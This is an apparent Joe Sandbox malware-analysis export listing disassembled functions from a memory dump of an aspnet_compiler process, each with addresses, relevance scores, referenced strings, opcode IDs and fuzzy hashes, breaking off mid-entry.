Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: b8e34631ed8f0e20e272b21cd5ac359df0d316513fed52ecb325a12a4ad6864f
Instruction ID: 7b3f83e596da90602d0ea2fb150b426a031d1f962aab05d9a70580e30e4ef414
Opcode Fuzzy Hash: b8e34631ed8f0e20e272b21cd5ac359df0d316513fed52ecb325a12a4ad6864f
Instruction Fuzzy Hash: 9D418930A0564ADBDB219F69C890BAE7BB4FF84704F2884A9E900DF395E7B5D900CB50

Function 016435BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 016435EC
LdrResGetRCConfig Exit, xrefs: 016435FE

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 471850fa3949d9dd81fecfaea4dad2f39981deb26425b8278ebce8d4c2f9e784
Instruction ID: 08e4680a32a08728fbd47a7fa875d3c60fc2f868adaaf428676471a0764b232f
Opcode Fuzzy Hash: 471850fa3949d9dd81fecfaea4dad2f39981deb26425b8278ebce8d4c2f9e784
Instruction Fuzzy Hash: 5C31A9312087669BE311EF68D854B2ABBE4FF94750F14086DF9548B390EB30D905CB96

Function 015E329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 015E330D
.Local\, xrefs: 015E32B5

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: fc1dc1f91a3f023fb02af07d6dee5f9b220daa384633c8d94a26e21aa72912d6
Instruction ID: 48785e543fcb86591c236feda3dbc595fb76e8180b968e0cc959ebd473d2714a
Opcode Fuzzy Hash: fc1dc1f91a3f023fb02af07d6dee5f9b220daa384633c8d94a26e21aa72912d6
Instruction Fuzzy Hash: 24318172908305AFC365DF28C884E6FBBE8FB88654F40092EF9958B250DA31DD04CB92

Function 015EA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 015EA5E9
Cleanup Group, xrefs: 015EA5E4

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 343bb90c7cf862df98fc171561a49631ec2326b294994b2b58f6a7b529d54e2c
Instruction ID: fe8ba23cdb40cd39b23802712379014ae173c5b242be31c3d9fe181bc2ee57dd
Opcode Fuzzy Hash: 343bb90c7cf862df98fc171561a49631ec2326b294994b2b58f6a7b529d54e2c
Instruction Fuzzy Hash: C501DCB2A54700AFD321DF24CE49B2677E8F785B25F058979E659CB190E374E804CB46

Function 0165A118 Relevance: 1.8, Strings: 1, Instructions: 591COMMON

Download Yara Rule

Strings

@, xrefs: 0165A68B

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 5fd2abd83f0386f34bc07c06a64bbd7af045e35f3f026b901c871c92873fec72
Instruction ID: 4b76ddd8dc46d342b01b122f4e34dbca870d42a79dbfc601b3befad01cf62cf2
Opcode Fuzzy Hash: 5fd2abd83f0386f34bc07c06a64bbd7af045e35f3f026b901c871c92873fec72
Instruction Fuzzy Hash: 4C22C1742046618FEBA5CFADC894772BBF1AF44344F08865ADD868F386E735E452CB60

Function 015B7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca4f3f16601fd9623cbec6678d62c5ce4f2e0c697b2df4a8aed37435d71476c
Instruction ID: db347f447624830676fbab25cdba63eda12ee2bbc978f13dc8834a8f82898f74
Opcode Fuzzy Hash: 3ca4f3f16601fd9623cbec6678d62c5ce4f2e0c697b2df4a8aed37435d71476c
Instruction Fuzzy Hash: 51A15871608342CFC721DF28C480A6ABBF6BFD8704F15896EE5859B391E770E945CB92

Function 01636420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 016365C1

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 12da2f8515f72ce54dfb73e0ef59727bbfda68526a5286b992a46e67aac2c9f9
Instruction ID: 836f8d45af19fe814070217369564c581f24821263da08bff5daf4d2e39e8586
Opcode Fuzzy Hash: 12da2f8515f72ce54dfb73e0ef59727bbfda68526a5286b992a46e67aac2c9f9
Instruction Fuzzy Hash: EF9163B190021ABFDB21DF99CC85FAE7BB8FF95B50F154065F600AB291D774AA00CB61

Function 0166B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 0166B28F

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: ce4167f4028ae2c6f907ce53665fc5527df8d4b873255cd4dc46246bddf79e8c
Instruction ID: 29d99352bc94ef9ca8039a9273edf261e6de7fbb69e95f62d645ac6348359d00
Opcode Fuzzy Hash: ce4167f4028ae2c6f907ce53665fc5527df8d4b873255cd4dc46246bddf79e8c
Instruction Fuzzy Hash: DA417472F0021AEBDB11AA99CC40AEEB7BDAF44650F154166EE11FB250EB749E41C7A0

Function 0165705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 016570A4

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: ddf675533afa4945179c2020d2784f338db6a1c584a22fc7c5e19b045b87907f
Instruction ID: b494d5d384d3838164981c870a4f91ecd582837178785e9e197c78eb552c81a9
Opcode Fuzzy Hash: ddf675533afa4945179c2020d2784f338db6a1c584a22fc7c5e19b045b87907f
Instruction Fuzzy Hash: E04187725013524AE731AB78EC84BA53FA5BB40764F9C221CED508B2C9CBB06891CFA1

Function 015E7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 01624622

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: 0cde52806e0924fd93d83933e544c78fce8bcc1b8b172fb31137139b44c2fca2
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: 18416D75E00666DBDF29DF88C894BBEB7F5BB89601F00445AE9459B240DB30D941CBE1

Function 015B5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 015B50BF

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: d83a4f28c46f5a1c95b38b1d0b787476e6c731a76123141ce76717f84c8e7651
Instruction ID: 517afaded48548388ba7ee7c4b5ab54b13ab8633a09f65f616837f7f0d7c53af
Opcode Fuzzy Hash: d83a4f28c46f5a1c95b38b1d0b787476e6c731a76123141ce76717f84c8e7651
Instruction Fuzzy Hash: FF11E9307246068BEB2C5D1C88D06FA77D5FB81224F38493AE992CF391F671DC408380

Function 0163106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 016310F7

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: 716cfd01fa3536fd826b06574f80644f0329f3aead023bdcaa432f27a41994d1
Instruction ID: bc9de9a72f46dbb209c7cf27506842f72d893fad9966603707df685509cd52e8
Opcode Fuzzy Hash: 716cfd01fa3536fd826b06574f80644f0329f3aead023bdcaa432f27a41994d1
Instruction Fuzzy Hash: 7B2104B15083859FC320DF1AC844A9BFBE8FBD5B50F404A1EB9949B350D7B09905CF92

Function 0160739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b531b291a9e21f176d07f1b856f0588bf4be2951abebf8769ec65081baf0c3d4
Instruction ID: 06f24fee6436918722631fdccf102b1f7603da8f1a68f129a32de17a869cdc20
Opcode Fuzzy Hash: b531b291a9e21f176d07f1b856f0588bf4be2951abebf8769ec65081baf0c3d4
Instruction Fuzzy Hash: DE429171A006169FDB1ACF59C8906BEB7B2FF88314B14856DD596AB380DB34FD42CB90

Function 015DB2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ba2a9e1df2598006158feb4986a35d833d30a378cadfcec1575747c12567c3
Instruction ID: 12520709bd6ead4599f224d84c76af8ca76b4254d7ad87fbc790da05141554a8
Opcode Fuzzy Hash: 08ba2a9e1df2598006158feb4986a35d833d30a378cadfcec1575747c12567c3
Instruction Fuzzy Hash: 2C329F71E0021ADBDF24CF9CC890BAEBBB2FF95714F190129E905AB391E7359911CB91

Function 01648158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fda69b1e51e8f6e38d1e998135ff081d28783b944046181ac71cd5d0a730b48
Instruction ID: cbf7c1fbf473750be9c974792c50f9bd85c8c4dc9258c8d33b282fa53b25c593
Opcode Fuzzy Hash: 6fda69b1e51e8f6e38d1e998135ff081d28783b944046181ac71cd5d0a730b48
Instruction Fuzzy Hash: C0424D75A102198FEB25CFA9CC41BADBBF9BF88300F158199E949EB342D7349985CF50

Function 015B65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d55a9daf4f81103943272b2a3c1f4fbbb0e5a3231331049af4c00bc5cb24554
Instruction ID: cc983d73c33d512c3354f959f4b44a000bf1b43437bf5aba48d8b7d4eb510b18
Opcode Fuzzy Hash: 9d55a9daf4f81103943272b2a3c1f4fbbb0e5a3231331049af4c00bc5cb24554
Instruction Fuzzy Hash: CBE16E71608342CFC715CF28C5D0AAABBE1FF89314F15896DE9998B351EB31E905CB92

Function 015A8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58f26881e74ff63098af7f8b3111846ba053610a6e02cb286406b67dfe17a167
Instruction ID: 851832165fe2eb6be89bf81294352b34d7e11fa3e5dd1a5daa802811250f970e
Opcode Fuzzy Hash: 58f26881e74ff63098af7f8b3111846ba053610a6e02cb286406b67dfe17a167
Instruction Fuzzy Hash: 08D1CF75A406179BDB19DF68CC80ABF7BF5BF94205F48862DE9169F280EB30E950CB50

Function 01638243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 79192c505c147ea3638cdb04ef0b4f47e18fa71008a3b4572ec7964a6764ac56
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 3FB15E74A00605AFDF24DB99CD40AEBBBBABFC4304F10856DBA5297791DB34E905CB50

Function 015CF460 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bbfc4f165a462ad9dd85b215200c1e370da3b389c95f0645d67001ab6958241
Instruction ID: 09b765c6cc45192878eefcdf34e1a2c90e0ca573178b019808e9e1c2744f3477
Opcode Fuzzy Hash: 0bbfc4f165a462ad9dd85b215200c1e370da3b389c95f0645d67001ab6958241
Instruction Fuzzy Hash: 90C13531A002218FDB29CFACC8947BDBBA3FB54B14F19415EE9469F3A6D7309980CB50

Function 015C0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 87282a10d9323ce85b4c4e64dc40f363481970a0e0e100c63dae302b769e8610
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 3AB1F135604646EFDB25CFA8C850BBEBBF6BF84700F184599E6529B385DB30E941CB90

Function 015D90DB Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e08467d93456a52b0474703c3ad26ad9ca1eb1cca6e776669a79d634858686e1
Instruction ID: dafe3d3e6239449c2dd5b16364ecdc665d8eb412454b7043f5766ea0933caf30
Opcode Fuzzy Hash: e08467d93456a52b0474703c3ad26ad9ca1eb1cca6e776669a79d634858686e1
Instruction Fuzzy Hash: 40A13E71510216AFEB22EFA8CC45BAE7BB9BF95750F054058FA00AF290D775EC10CBA0

Function 015B83C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddcf792a8aa9186c137a905fa9914e637230def07506372d6ab4e70e423cadc7
Instruction ID: f7552c05496cef986bf9d89f979eb3bc12dea7be345e1e1b6ec6b0eebc5dcb8a
Opcode Fuzzy Hash: ddcf792a8aa9186c137a905fa9914e637230def07506372d6ab4e70e423cadc7
Instruction Fuzzy Hash: 44C158745083418FD764DF29C884BAAB7E9BF88304F44495DEA898B391E774E908CF92

Function 015DE5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5c7d338169a516812a5f34b42bb6e0f1e89e6e01bb97fc05138efb3975d1452
Instruction ID: 8cff2803c402d9a3505db11a21679615ce461245b9128b11d85d3211b5d79fbc
Opcode Fuzzy Hash: c5c7d338169a516812a5f34b42bb6e0f1e89e6e01bb97fc05138efb3975d1452
Instruction Fuzzy Hash: E6A11231E0065A9FEB32DB9CCC45BAEBBB4FB00754F0901A5EA11AF295D774AD44CB90

Function 015F0185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a3b4d23220a18ef99e52e07cb4dc8c4e756043639c4f8aa365eb1e056bc838
Instruction ID: 25961a4d7d0cf565414b5b9ca1ad4200dd3a4609a822b722da6084703d52fecf
Opcode Fuzzy Hash: a6a3b4d23220a18ef99e52e07cb4dc8c4e756043639c4f8aa365eb1e056bc838
Instruction Fuzzy Hash: 32A1B570B006269BEB25DF69C9947AA77E6FF44314F18402DEB059B2D2DB34E811CB50

Function 01684500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6ac60b6f6f23dd4a947c92fd147083233a1e7b8819ad888fb5642d1ef771aaf
Instruction ID: c0a30b2e9dbf0a258fe896436177394999dc6ec1537bd1175c7b8ae11cd6145f
Opcode Fuzzy Hash: b6ac60b6f6f23dd4a947c92fd147083233a1e7b8819ad888fb5642d1ef771aaf
Instruction Fuzzy Hash: 4FA1CCB2A102139FC711EF58CD80B6ABBE9FF98704F46462CE5869B750DB74E801CB91

Function 016360E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ece5d1b30341b4dbe135a13b22857d49ad35f5bfd27fdf0116710bc7e24a280d
Instruction ID: a3bab5cd38425fbbc1cbdf08f260bd8fe00520a51aefd5bf8bc74c94a4cd5bcf
Opcode Fuzzy Hash: ece5d1b30341b4dbe135a13b22857d49ad35f5bfd27fdf0116710bc7e24a280d
Instruction Fuzzy Hash: AF917071E00216BFDB15CFA8DC94BAEBFB5AF88710F154169E610EB341D734EA019BA4

Function 015CE3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f212d624ffbcb1e956248f5d1f78edbc4fa4bce06533b6ff657f3ade708c57c
Instruction ID: 42f63e33cc145db130866646d0a6162e2c605cdc46a84d5836599dd8d5849ede
Opcode Fuzzy Hash: 3f212d624ffbcb1e956248f5d1f78edbc4fa4bce06533b6ff657f3ade708c57c
Instruction Fuzzy Hash: 4591E331A006168FEB249F99C895B7EBBA2FB94B14F09446DED059F384E734DD01CB91

Function 015B1131 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 715b6afba8d45d5007c17e434c850059896c6dbbe9681f90005341bb420be779
Instruction ID: 752b1ba1b5f62685dea3c63fc55b1acdae6bdf08da48b427b43434bf8b96f5ad
Opcode Fuzzy Hash: 715b6afba8d45d5007c17e434c850059896c6dbbe9681f90005341bb420be779
Instruction Fuzzy Hash: B6B103B15097418FD365CF28C880A5BFBF1BB88704F18496EE999CB352D371E945CB42

Function 0166B52F Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
Instruction ID: 1e378eaa366eb7ddbca40b3104899fe7ea7494440230cdf90cf646ee4cfefce0
Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
Instruction Fuzzy Hash: 6A716235B0021AEBDB20CF69CC90ABEBBBDBF54750F59416AD901EB341E739D9418B90

Function 015DD090 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction ID: c25eba97409bf9b5c1ca82afec472288d495ef60d3ed01fb69cf4bee7a70e3f4
Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction Fuzzy Hash: 41817F72E011168BDF26CFACCC817ADBBB2FB84314F19416ADD15AB388D73299418B91

Function 015EE284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab5677e021be005613080fcecd940e78ec6ed706113f7e943d68c6cd6e62c65
Instruction ID: 353ca8d7c31074e40c8f7320cb4a97bc2187746e650bdbcf315fca48debde9e2
Opcode Fuzzy Hash: 7ab5677e021be005613080fcecd940e78ec6ed706113f7e943d68c6cd6e62c65
Instruction Fuzzy Hash: 2D817F71E00619AFDB25CFA9C885AEEBBFAFF88354F10442DE555AB250D730AC45CB60

Function 0163035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction ID: 52d7556ac1ea1c3a9a235744a24c35108ec09338b8a527d9e572202e3d88a4e2
Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction Fuzzy Hash: D1718071A0060AEFDB10DFA9C984EDEBBB9FF88710F104569E505EB290DB30EA05CB54

Function 016462A0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e99a92d0eda6a0912cff74664d1cc365664fb757d774de0bcefc1d3092d0ec70
Instruction ID: e640f3619f5c573a3df0d45a8e234c971e341ca42efd840dae4c3bbb3aa01bf6
Opcode Fuzzy Hash: e99a92d0eda6a0912cff74664d1cc365664fb757d774de0bcefc1d3092d0ec70
Instruction Fuzzy Hash: DE71F172200702AFEB32DF58CC44F6ABBA6FF85720F14842CE6568B2A0D775E944CB50

Function 0167132D Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3b8c642c2a76a1d52c10c60ba500713a339c066729acc344c42c96a91757f4b
Instruction ID: c31096800eaf348d4b4d6f3986a59ea1153bc742bc8788346f238b983a75c974
Opcode Fuzzy Hash: a3b8c642c2a76a1d52c10c60ba500713a339c066729acc344c42c96a91757f4b
Instruction Fuzzy Hash: E1818F71A00205DFDB09CFA8C890AAEBBF1FF49310F1581AAD859EB355D734EA51CB90

Function 0167903E Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd1526f64deaa7de2bb4916dad1b6ae14feb04703ef56332ce10dac279902fe
Instruction ID: 9a2ed2f9a10a5a870c88701482110601404b6d24c36551ac375505cd54e0f07f
Opcode Fuzzy Hash: 7dd1526f64deaa7de2bb4916dad1b6ae14feb04703ef56332ce10dac279902fe
Instruction Fuzzy Hash: 1361AC71610616AFD715DF68CC84BABBBE9FF88728F00861DF96987240DB30A915CB91

Function 016792A6 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3028fc3db687a158e81628717f0b377ccf0c4e1930eabd401acde4ea197b0be
Instruction ID: 7ab33a7e0c36a87d50e6c892654de23eb4ba31f8a87589ea512098ae321da29a
Opcode Fuzzy Hash: d3028fc3db687a158e81628717f0b377ccf0c4e1930eabd401acde4ea197b0be
Instruction Fuzzy Hash: CB6103312157428BE315DF68CC94B6ABBE1FF90728F18486DE9958B391DB35E806CB81

Function 015AB2D3 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
